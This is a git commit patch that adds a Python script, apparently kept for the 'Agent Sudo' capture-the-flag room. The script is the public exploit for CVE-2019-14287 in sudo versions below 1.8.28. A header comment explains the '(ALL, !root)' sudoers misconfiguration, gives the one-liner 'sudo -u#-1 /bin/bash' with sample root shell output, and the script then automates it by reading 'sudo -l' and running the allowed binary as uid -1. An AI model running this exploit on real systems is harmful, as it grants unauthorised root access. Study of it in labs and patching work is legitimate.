From 8e07e852ee302516e02e8d2773ca45538c28910e Mon Sep 17 00:00:00 2001 From: Raghuram Subramani Date: Sat, 17 Sep 2022 21:21:29 -0400 Subject: add agent_sudo --- agent_sudo/47502.py | 80 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 agent_sudo/47502.py (limited to 'agent_sudo/47502.py') diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py new file mode 100644 index 0000000..907d29a --- /dev/null +++ b/agent_sudo/47502.py @@ -0,0 +1,80 @@ +# Exploit Title : sudo 1.8.27 - Security Bypass +# Date : 2019-10-15 +# Original Author: Joe Vennix +# Exploit Author : Mohin Paramasivam (Shad0wQu35t) +# Version : Sudo <1.8.28 +# Tested on Linux +# Credit : Joe Vennix from Apple Information Security found and analyzed the bug +# Fix : The bug is fixed in sudo 1.8.28 +# CVE : 2019-14287 + +'''Check for the user sudo permissions + +sudo -l + +User hacker may run the following commands on kali: + (ALL, !root) /bin/bash + + +So user hacker can't run /bin/bash as root (!root) + + +User hacker sudo privilege in /etc/sudoers + +# User privilege specification +root ALL=(ALL:ALL) ALL + +hacker ALL=(ALL,!root) /bin/bash + + +With ALL specified, user hacker can run the binary /bin/bash as any user + +EXPLOIT: + +sudo -u#-1 /bin/bash + +Example : + +hacker@kali:~$ sudo -u#-1 /bin/bash +root@kali:/home/hacker# id +uid=0(root) gid=1000(hacker) groups=1000(hacker) +root@kali:/home/hacker# + +Description : +Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv +-u#-1 returns as 0 which is root's id + +and /bin/bash is executed with root permission +Proof of Concept Code : + +How to use : +python3 sudo_exploit.py + +''' + + +#!/usr/bin/python3 + +import os + +#Get current username + +username = input("Enter current username :") + + +#check which binary the user can run with sudo + +os.system("sudo -l > priv") + + +os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary") + +binary_file = open("binary") + +binary= binary_file.read() + +#execute sudo exploit + +print("Lets hope it works") + +os.system("sudo -u#-1 "+ binary) \ No newline at end of file -- cgit v1.2.3